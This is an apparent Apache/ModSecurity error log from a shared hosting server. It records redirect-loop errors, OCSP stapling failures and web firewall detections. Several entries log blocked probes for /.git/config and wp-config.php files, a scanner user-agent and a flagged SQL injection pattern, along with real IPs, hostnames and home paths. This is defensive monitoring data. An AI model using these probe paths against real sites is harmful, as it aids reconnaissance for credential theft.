[Mon May 11 21:02:33.805189 2026] [core:error] [pid 1501831:tid 1501844] [client 4.193.137.131:15509] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:33.805227 2026] [core:error] [pid 1501831:tid 1501844] [client 4.193.137.131:15509] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:34.309803 2026] [core:error] [pid 1502013:tid 1502038] [client 4.193.137.131:15534] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:34.309837 2026] [core:error] [pid 1502013:tid 1502038] [client 4.193.137.131:15534] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:34.752058 2026] [security2:error] [pid 1511173:tid 1511182] [client 20.220.233.65:64146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agInyfjVc-A-CSptvm10MAAAAEY"]
[Mon May 11 21:02:34.856241 2026] [core:error] [pid 1501883:tid 1501896] [client 4.193.137.131:15493] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:34.856271 2026] [core:error] [pid 1501883:tid 1501896] [client 4.193.137.131:15493] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:35.341432 2026] [core:error] [pid 1502013:tid 1502066] [client 4.193.137.131:15506] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:35.343795 2026] [core:error] [pid 1502013:tid 1502066] [client 4.193.137.131:15506] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:35.844091 2026] [core:error] [pid 1501831:tid 1501836] [client 4.193.137.131:15512] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:35.844123 2026] [core:error] [pid 1501831:tid 1501836] [client 4.193.137.131:15512] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:36.484995 2026] [core:error] [pid 1501831:tid 1501840] [client 4.193.137.131:15518] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:36.485042 2026] [core:error] [pid 1501831:tid 1501840] [client 4.193.137.131:15518] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:37.067895 2026] [core:error] [pid 1502013:tid 1502035] [client 4.193.137.131:15490] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:37.068458 2026] [core:error] [pid 1502013:tid 1502035] [client 4.193.137.131:15490] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:37.573172 2026] [core:error] [pid 1516058:tid 1516110] [client 4.193.137.131:15505] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:37.573204 2026] [core:error] [pid 1516058:tid 1516110] [client 4.193.137.131:15505] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:38.079856 2026] [core:error] [pid 1501883:tid 1501903] [client 4.193.137.131:15504] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:38.079899 2026] [core:error] [pid 1501883:tid 1501903] [client 4.193.137.131:15504] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:38.567400 2026] [core:error] [pid 1534836:tid 1534874] [client 4.193.137.131:15522] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:38.567438 2026] [core:error] [pid 1534836:tid 1534874] [client 4.193.137.131:15522] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:02:43.503831 2026] [authz_core:error] [pid 1516058:tid 1516090] [client 216.73.216.110:14206] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/auth/openid/error_log
[Mon May 11 21:03:00.024505 2026] [security2:error] [pid 1534836:tid 1534887] [client 43.157.38.131:46316] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/wp-json/wp/v2/pages/1066"] [unique_id "agIn5NeaRXe5lR8y0ZOWOwAAAVA"]
[Mon May 11 21:03:13.738252 2026] [security2:error] [pid 1501831:tid 1501835] [client 34.154.110.172:47808] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.git/config"] [unique_id "agIn8VNddpkriGUb6ZV5jAAAAQI"]
[Mon May 11 21:03:13.739086 2026] [security2:error] [pid 1501831:tid 1501835] [client 34.154.110.172:47808] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.git/config"] [unique_id "agIn8VNddpkriGUb6ZV5jAAAAQI"]
[Mon May 11 21:03:15.925872 2026] [security2:error] [pid 1501831:tid 1501835] [client 34.154.110.172:47808] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agIn8VNddpkriGUb6ZV5jAAAAQI"]
[Mon May 11 21:03:22.176970 2026] [ssl:error] [pid 1501883:tid 1501902] (EAI 2)Name or service not known: [client 74.7.241.176:52844] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:03:22.177199 2026] [ssl:error] [pid 1501883:tid 1501902] AH01941: stapling_renew_response: responder error
[Mon May 11 21:03:38.815996 2026] [security2:error] [pid 1501883:tid 1501892] [client 20.220.233.65:42915] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "krakoukas.com"] [uri "/new-wp-config.php"] [unique_id "agIoCjP5Q_-MBliRCAxqnAAAAAc"]
[Mon May 11 21:03:38.816385 2026] [security2:error] [pid 1501883:tid 1501892] [client 20.220.233.65:42915] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "krakoukas.com"] [uri "/new-wp-config.php"] [unique_id "agIoCjP5Q_-MBliRCAxqnAAAAAc"]
[Mon May 11 21:03:40.288029 2026] [security2:error] [pid 1501883:tid 1501892] [client 20.220.233.65:42915] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agIoCjP5Q_-MBliRCAxqnAAAAAc"]
[Mon May 11 21:03:48.824528 2026] [ssl:error] [pid 1511173:tid 1511182] (EAI 2)Name or service not known: [client 216.157.41.80:56642] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:03:48.824720 2026] [ssl:error] [pid 1511173:tid 1511182] AH01941: stapling_renew_response: responder error
[Mon May 11 21:03:49.157445 2026] [ssl:error] [pid 1501883:tid 1501887] (EAI 2)Name or service not known: [client 216.157.41.88:42704] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:03:49.157597 2026] [ssl:error] [pid 1501883:tid 1501887] AH01941: stapling_renew_response: responder error
[Mon May 11 21:03:49.439849 2026] [ssl:error] [pid 1502013:tid 1502066] (EAI 2)Name or service not known: [client 146.75.166.63:6781] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:03:49.439898 2026] [ssl:error] [pid 1502013:tid 1502066] AH01941: stapling_renew_response: responder error
[Mon May 11 21:03:49.474505 2026] [ssl:error] [pid 1501831:tid 1501850] (EAI 2)Name or service not known: [client 146.75.166.63:6867] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:03:49.474555 2026] [ssl:error] [pid 1501831:tid 1501850] AH01941: stapling_renew_response: responder error
[Mon May 11 21:03:49.839230 2026] [ssl:error] [pid 1534836:tid 1534880] (EAI 2)Name or service not known: [client 216.157.41.75:3274] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:03:49.839349 2026] [ssl:error] [pid 1534836:tid 1534880] AH01941: stapling_renew_response: responder error
[Mon May 11 21:03:50.054503 2026] [ssl:error] [pid 1501831:tid 1501842] (EAI 2)Name or service not known: [client 216.157.41.87:49495] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:03:50.057650 2026] [ssl:error] [pid 1501831:tid 1501842] AH01941: stapling_renew_response: responder error
[Mon May 11 21:05:37.608712 2026] [security2:error] [pid 1501883:tid 1501889] [client 43.135.140.225:42936] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/transactions-anterieures-managing-partner/"] [unique_id "agIogTP5Q_-MBliRCAxrVwAAAAQ"]
[Mon May 11 21:05:40.447273 2026] [security2:error] [pid 1534836:tid 1534889] [client 43.166.7.113:59830] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/pieces/pour-un-cirque-imaginaire/"] [unique_id "agIohNeaRXe5lR8y0ZOXeAAAAVI"]
[Mon May 11 21:05:49.003459 2026] [ssl:error] [pid 1502013:tid 1502058] (EAI 2)Name or service not known: [client 74.7.175.189:39548] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:05:49.003516 2026] [ssl:error] [pid 1502013:tid 1502058] AH01941: stapling_renew_response: responder error
[Mon May 11 21:05:53.864616 2026] [security2:error] [pid 1534836:tid 1534874] [client 43.157.148.38:56244] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "homin.fr"] [uri "/fr/glossaire/8"] [unique_id "agIokdeaRXe5lR8y0ZOXjgAAAUM"]
[Mon May 11 21:06:57.595033 2026] [security2:error] [pid 1511173:tid 1511194] [client 43.159.62.163:35466] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/wp-content"] [unique_id "agIo0fjVc-A-CSptvm12JQAAAFI"]
[Mon May 11 21:07:00.609479 2026] [security2:error] [pid 1501831:tid 1501837] [client 43.159.62.163:37962] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/"] [unique_id "agIo1FNddpkriGUb6ZV7EgAAAQQ"], referer: http://la-grande-fabrique.com/wp-content
[Mon May 11 21:07:08.463899 2026] [security2:error] [pid 1501831:tid 1501847] [client 43.164.192.151:34454] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/simple-ronde/"] [unique_id "agIo3FNddpkriGUb6ZV7GQAAAQ4"]
[Mon May 11 21:07:21.921092 2026] [:error] [pid 1534836:tid 1534876] [client 155.2.212.2:63593] File does not exist: /home/cpcentre/public_html/wp-login.php
[Mon May 11 21:07:53.202500 2026] [security2:error] [pid 1511173:tid 1511181] [client 124.156.206.78:42718] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation/mobil-home-confort/"] [unique_id "agIpCfjVc-A-CSptvm13GwAAAEU"]
[Mon May 11 21:08:07.962318 2026] [security2:error] [pid 1511173:tid 1511178] [client 43.157.22.57:45704] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "culturesvoile.com"] [uri "/"] [unique_id "agIpF_jVc-A-CSptvm13ewAAAEI"], referer: http://culturesvoile.com
[Mon May 11 21:08:19.315803 2026] [authz_core:error] [pid 1534836:tid 1534892] [client 216.73.216.110:12366] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/cron/lang/error_log
[Mon May 11 21:08:46.724012 2026] [:error] [pid 1501883:tid 1501887] [client 114.119.136.64:33995] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/category/blog/
[Mon May 11 21:08:48.779360 2026] [security2:error] [pid 1516058:tid 1516092] [client 45.159.248.74:57468] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: e59184acd5f43a0cc70a952273550793||1778528313||1778527953"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIpQCMeXtzav-mi9Sy3QQAAAMI"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 21:08:48.779597 2026] [security2:error] [pid 1516058:tid 1516092] [client 45.159.248.74:57468] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIpQCMeXtzav-mi9Sy3QQAAAMI"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 21:08:48.784771 2026] [security2:error] [pid 1516058:tid 1516092] [client 45.159.248.74:57468] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIpQCMeXtzav-mi9Sy3QQAAAMI"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 21:08:56.932422 2026] [security2:error] [pid 1501831:tid 1501841] [client 43.128.73.132:53316] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.manhattan-studio.fr"] [uri "/"] [unique_id "agIpSFNddpkriGUb6ZV7lgAAAQg"], referer: http://www.manhattan-studio.fr
[Mon May 11 21:09:05.013674 2026] [access_compat:error] [pid 1511173:tid 1511197] [client 168.138.172.235:60695] AH01797: client denied by server configuration: /home/krakouka/public_html/wp-content/uploads/wp-statistics/
[Mon May 11 21:09:05.347644 2026] [access_compat:error] [pid 1511173:tid 1511197] [client 168.138.172.235:60695] AH01797: client denied by server configuration: /home/krakouka/public_html/wp-content/uploads/wp-statistics/
[Mon May 11 21:09:14.073579 2026] [security2:error] [pid 1534836:tid 1534878] [client 111.14.252.134:5003] ModSecurity: Warning. Matched phrase "user-agent:" at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "33"] [id "913100"] [rev "2"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: user-agent: found within REQUEST_HEADERS:User-Agent: user-agent:mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "krakoukas.com"] [uri "/"] [unique_id "agIpWteaRXe5lR8y0ZOYowAAAUc"], referer: https://krakoukas.com/
[Mon May 11 21:09:14.074380 2026] [security2:error] [pid 1534836:tid 1534878] [client 111.14.252.134:5003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "krakoukas.com"] [uri "/"] [unique_id "agIpWteaRXe5lR8y0ZOYowAAAUc"], referer: https://krakoukas.com/
[Mon May 11 21:09:16.231538 2026] [security2:error] [pid 1534836:tid 1534878] [client 111.14.252.134:5003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Found User-Agent associated with security scanner"] [tag "event-correlation"] [hostname "krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agIpWteaRXe5lR8y0ZOYowAAAUc"], referer: https://krakoukas.com/
[Mon May 11 21:09:16.677606 2026] [security2:error] [pid 1511173:tid 1511192] [client 43.153.104.196:33146] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agIpXPjVc-A-CSptvm14GAAAAFA"]
